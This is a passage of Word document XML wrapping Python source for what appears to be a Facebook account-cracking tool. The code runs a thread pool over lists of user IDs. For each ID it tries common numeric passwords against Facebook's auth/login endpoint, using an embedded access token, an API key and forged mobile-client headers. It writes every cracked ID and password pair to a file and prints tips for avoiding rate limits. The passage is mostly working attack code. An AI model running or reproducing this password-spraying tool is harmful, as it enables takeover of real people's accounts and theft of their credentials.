        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3922E34D" w14:textId="0901E8DE" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    meth = input(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mCHOICE {W}(A/B): {Y}”).strip().upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76E515" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>max_workers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=30) as pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EFD85" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21909536" w14:textId="605E0B84" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mTOTAL ID FROM CRACK {Y}: {G}{limit}{W}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B8ED71" w14:textId="60273ADD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mUSE AIRPLANE MOD FOR GOOD RESULT{G}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79E410" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2F15C0" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F623BB9" w14:textId="03F5E89B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            if meth == ‘A’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699DAEF" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pool.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(login_1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770DB8B" w14:textId="77AF0EF5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> meth == ‘B’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA3195E" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pool.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(login_2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F111BFE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6BA7E2" w14:textId="06304D4A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                print(f”    {rad}[!] INVALID METHOD SELECTED”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23143CF4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A732ACA" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D7289" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F9B81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login_1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DD845F" w14:textId="3FABF906" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C088D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Login attempt method 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50F378" w14:textId="37309974" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E993229" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    global loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06263A7F" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    session = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests.session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039EC753" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D515C91" w14:textId="64E45847" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        sys.stdout.write(f”\r\r\x1b[1;37m\x1b[38;5;196m+\x1b[1;37m\x1b[38;5;196m(\x1b[1;37mAHB-M1\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[38;5;192m{loop}\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[1;37mOK\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m(\x1b[38;5;192m{len(oks)}\x1b[38;5;196m)”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35592754" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384696B6" w14:textId="681E026B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        for pw in (‘123456’, ‘1234567’, ‘12345678’, ‘123456789’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07108BC1" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE111B" w14:textId="1ADAE212" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(uuid.uuid4()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72EFCF" w14:textId="673B6D6E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘format’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0066981E" w14:textId="1B4A7072" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(uuid.uuid4()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE6680C" w14:textId="41DD1A50" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘true’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74329A8E" w14:textId="5E8AC2EE" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>family_device_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(uuid.uuid4()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54602DF3" w14:textId="08020BFD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>credentials_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_based_login_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFA091" w14:textId="604B6409" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>error_detail_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>button_with_disabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F93A0" w14:textId="41AE2F4E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘source’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_based_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF1667" w14:textId="47AF881D" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                ‘email’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B2684" w14:textId="5E16BD19" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                ‘password’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pw),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1592B" w14:textId="4A95FB9C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>access_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘350685531728|62f8ce9f74b12f84c123cc23437a4a32’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B67779" w14:textId="38C736F5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>generate_session_cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘1’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E124747" w14:textId="65192A0A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meta_inf_fbmeta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E456553" w14:textId="31F75926" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>advertiser_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(uuid.uuid4()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D2EFE" w14:textId="5E6A223B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>currently_logged_in_userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘0’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77109A44" w14:textId="2E520C5B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘locale’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en_US</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB144B" w14:textId="4D153614" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client_country_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘US’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546692D" w14:textId="0630103C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘method’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auth.login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D9459" w14:textId="1F54CBFD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fb_api_req_friendly_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘authenticate’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A711297" w14:textId="4ACEFCAF" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fb_api_caller_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘com.facebook.account.login.protocol.Fb4aAuthHandler’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE31939" w14:textId="7C787A4E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’: ‘882a8490361da98702bf97a021ddc14d’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B8EE7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5FCAD" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB3AA3" w14:textId="06F06D11" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘User-Agent’: window1(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F54520" w14:textId="4094F378" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘Content-Type’: ‘application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69B92A" w14:textId="37E81CBF" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘Host’: ‘graph.facebook.com’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1403E" w14:textId="4F6C2E08" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-Net-HNI’: ‘25227’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A8F5E" w14:textId="0420B015" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-SIM-HNI’: ‘29752’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B0B4C" w14:textId="1B59CC83" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-Connection-Type’: ‘MOBILE.LTE’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D5014" w14:textId="57F66231" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tigon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-Is-Retry’: ‘False’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5F7A5" w14:textId="3670EAA7" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘x-fb-session-id’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jiZ+yNNBgbwC;pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Main;tid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=132;’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA2964" w14:textId="15D11012" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘x-fb-device-group’: ‘5120’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D2C0DD" w14:textId="6907E545" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-Friendly-Name’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ViewerReactionsMutation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DA877" w14:textId="5D7CA4D5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-Request-Analytics-Tags’: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>graphservice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5374B053" w14:textId="6694A361" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-HTTP-Engine’: ‘Liger’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D4ADA" w14:textId="59CD498E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-Client-IP’: ‘True’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D59D9" w14:textId="6E5FD144" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘X-FB-Server-Cluster’: ‘True’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CACB4" w14:textId="62FC0876" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                ‘x-fb-connection-token’: ‘d29d67d37eca387482a8a5b740f84f62’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA4B2E" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63232316" w14:textId="587EE203" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(‘https://b-graph.facebook.com/auth/login’, data=data, headers=headers, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allow_redirects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=False).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605FB1A" w14:textId="219A1AC9" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            if ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ in res:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7EF4CE" w14:textId="6460384F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                print(f”\r\r\x1b[1;37m&gt;\x1b[38;5;196m├Ч\x1b[1;37m&lt;\x1b[38;5;196m(\x1b[1;37mAHB\x1b[38;5;196m) \x1b[1;97m= \x1b[38;5;46m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} \x1b[1;97m= \x1b[38;5;46m{pw} \x1b[1;97m= \x1b[38;5;45m{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creationyear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27824CF1" w14:textId="173F3975" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                open(‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sdcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/AHB-OLD-M1-OK.txt’, ‘a’).write(f”{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}|{pw}\n”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE85AD" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oks.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB2CAB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1D6866" w14:textId="546418AA" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‘www.facebook.com’ in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>res.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘error’, {}).get(‘message’, ‘’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093AE773" w14:textId="4D762898" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
